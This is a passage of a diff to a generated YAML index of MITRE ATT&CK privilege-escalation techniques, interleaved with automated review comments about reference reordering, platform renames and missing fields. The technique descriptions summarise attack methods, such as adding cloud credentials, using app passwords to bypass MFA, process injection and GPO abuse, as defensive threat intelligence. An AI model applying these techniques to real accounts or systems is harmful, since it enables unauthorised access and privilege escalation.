id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
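Review bot: most of this hunk is reordering rather than change: the `Microsoft Environment Property`, `Microsoft CreateProcess` and `Microsoft WinExec` references are deleted and re-added in a different position, while the substantive edits are the two MSDN URLs moving to learn.microsoft.com with updated retrieval dates, the new `revoked: false` field, and the spec version bump from 3.1.0 to 3.2.0. If the generator preserved the existing order for unchanged reference entries this hunk would shrink to a handful of lines. Separately, `revoked: false` is emitted only for T1574.008 in the hunks shown here; confirm the generator writes it wherever the upstream object carries it rather than only for objects that were touched this round.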
@@ -18167,6 +18494,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -18178,16 +18509,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
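Review bot: this hunk and the one directly above it move `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique` and `x_mitre_platforms` into alphabetical positions without changing a single value. That is fine as a one-time normalisation of key order, but it is interleaved with real content changes elsewhere in this file (platform renames, new description text), which makes the review harder than it needs to be. Consider landing the key-sort change as its own commit, or at least calling it out in the commit message so reviewers can skip the pure-move hunks.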
@@ -18223,12 +18550,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -18236,14 +18563,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18258,6 +18584,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -18266,18 +18593,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
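Review bot: the platform list for T1078.001 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, with `x_mitre_version` going from 1.3 to 1.4; the same rename is applied to T1548, T1548.005 and T1098.005 further down. Any index or filter keyed on the old platform strings will stop matching these techniques, so every per-platform output derived from `x_mitre_platforms` has to be regenerated in this same change, and the changelog should say explicitly that the old platform names are gone so consumers of the index are not surprised by techniques silently disappearing from a platform view.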
@@ -18309,9 +18636,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -18383,7 +18707,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -18410,7 +18733,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -18436,13 +18759,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -18563,12 +18884,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -18600,11 +18920,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -18645,11 +18964,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
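Review bot: pre-existing, but visible in this hunk: the T1548 entry goes straight from the `x_mitre_modified_by_ref` line to `atomic_tests: []` with no `identifier: T1548` line, whereas T1134.002 directly below has `identifier: T1134.002` before its `atomic_tests`. The same gap shows up for T1548.005, T1055.013, T1574.005 and T1098.005 later in this file. If `identifier` is meant to be present on every technique the generator is missing it for some; if it is optional, a note in the index schema saying so would save the next reader from wondering.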
@@ -18705,12 +19023,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18767,7 +19084,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -18837,7 +19153,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -18947,7 +19262,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -19001,7 +19315,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -19034,13 +19348,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -19102,10 +19414,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -19163,7 +19474,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -19205,7 +19515,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -19264,8 +19574,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -19295,7 +19603,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19330,12 +19638,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19412,7 +19718,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -19451,7 +19756,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -19500,8 +19805,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -19533,7 +19836,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19581,13 +19884,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19600,16 +19901,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -19621,16 +19922,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
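Review bot: besides the `Azure AD` to `Identity Provider` rename, this hunk also removes `SaaS` from the T1098.005 platform list, so the technique no longer maps to SaaS at all, unlike T1078.001 above which keeps `SaaS` next to the new names. If that matches the upstream object it is fine, but it is a scope change rather than a rename and deserves a line in the commit message alongside the version bump to 1.3.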
@@ -19685,7 +19986,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -19708,7 +20008,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19752,8 +20052,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -19830,7 +20128,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -19858,8 +20156,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -19918,23 +20214,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
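Review bot: a two-token text change ("Azure AD" to "Azure / Entra ID") turns into a six-line rewrap here because the description is emitted as a folded double-quoted scalar at a fixed column width. T1547.009 and T1543.004 in this same file already use a literal block scalar (`description: |-`), which keeps each paragraph on one line and confines future diffs to the line that actually changed; emitting every description that way would make text updates like this one reviewable at a glance.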
@@ -19944,11 +20239,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
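Review bot: the new CreateLoginProfile sentence introduces two citation keys, `Permiso Scattered Spider 2023` and `Lacework AI Resource Hijacking 2024`, and both need a matching `source_name` under `external_references`; the hunk at `@@ -20013,10 +20323,18 @@` adds them, so keep the spelling identical in both places since the `(Citation: ...)` lookup is literal. The remaining changes here are the `Azure AD` to `Entra ID` rename in the Application Administrator example and the rewrap, so no tactic or test mapping is affected.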
@@ -19959,12 +20258,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
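Review bot: the `+ x_mitre_attack_spec_version: 3.2.0` line inserted after `kill_chain_phases` is the same key removed from the bottom of this object in `@@ -20045,9 +20373,6 @@`, so it is a reorder rather than a version change. The added app-password paragraph cites `Mandiant APT42 Operations 2024` and `Microsoft Entra ID App Passwords`, which `@@ -20025,10 +20343,20 @@` supplies. One upstream observation rather than a change for this generated file: the paragraph says app passwords bypass MFA and can outlive a primary password reset, yet the `x_mitre_detection` text in the next hunk still covers only Azure Activity Logs for service principal/application changes and SSH-key APIs, so detection guidance for app-password creation is absent.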
@@ -19973,6 +20279,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19981,13 +20288,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
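Review bot: `Azure AD` is dropped from `x_mitre_platforms` and `Identity Provider` added, `x_mitre_version` goes '2.7' to '2.8', and two `Active Directory:` data sources are added; the `x_mitre_modified_by_ref` line inserted here is the one removed at the bottom of the object in `@@ -20045,9 +20373,6 @@`. The new data sources are the hook for the app-password and credential-addition behaviour described above, so they are consistent with the description change, and the version bump is the expected upstream signal for it.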
@@ -20013,10 +20323,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
